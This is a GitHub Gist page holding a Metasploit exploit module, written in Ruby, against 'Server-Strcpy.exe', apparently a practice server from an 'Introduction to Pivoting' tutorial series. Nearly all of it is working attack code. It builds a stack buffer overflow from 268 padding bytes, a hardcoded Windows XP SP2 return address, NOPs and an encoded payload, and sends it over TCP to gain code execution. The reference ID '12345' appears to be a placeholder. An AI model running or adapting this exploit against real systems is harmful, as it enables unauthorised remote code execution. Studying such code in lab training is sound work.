Created
October 31, 2016 03:40
-
-
Save superkojiman/df9df065e2bbbef365aa5e2214e7f934 to your computer and use it in GitHub Desktop.
Metasploit module for Server-Strcpy.exe in the Introduction to Pivoting series
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Server-Strcpy.exe exploit by superkojiman | |
| # http://blog.techorganic.com | |
| require 'msf/core' | |
| class Metasploit3 < Msf::Exploit::Remote | |
| Rank = AverageRanking | |
| include Msf::Exploit::Remote::Tcp | |
| def initialize(info = {}) | |
| super(update_info(info, | |
| 'Name' => 'Server-Strcpy Buffer Overflow', | |
| 'Description' => %q{ | |
| This module exploits a stack buffer overflow in Server-Strcpy. | |
| }, | |
| 'License' => MSF_LICENSE, | |
| 'Author' => 'superkojiman', | |
| 'Version' => '$Revision: 1 $', | |
| 'References' => | |
| [ | |
| [ 'ID', '12345' ], | |
| ], | |
| 'DefaultOptions' => | |
| { | |
| 'EXITFUNC' => 'thread', | |
| 'RPORT' => '10000', | |
| }, | |
| 'Payload' => | |
| { | |
| 'Space' => 368, | |
| 'BadChars' => "\x00\x0a\x0d", | |
| }, | |
| 'Platform' => 'win', | |
| 'Targets' => | |
| [ | |
| [ 'Windows XP Pro SP2 English', { 'Ret' => 0x77DF2740 } ], | |
| ], | |
| 'Privileged' => true, | |
| 'DefaultTarget' => 0)) | |
| end | |
| def exploit | |
| connect | |
| sploit = "A" * 268 + [target.ret].pack('V') + make_nops(20) + payload.encoded | |
| sploit << rand_text_alpha_upper(819) | |
| print_status("Trying target #{target.name}...") | |
| sock.put(sploit) | |
| handler | |
| disconnect | |
| end | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment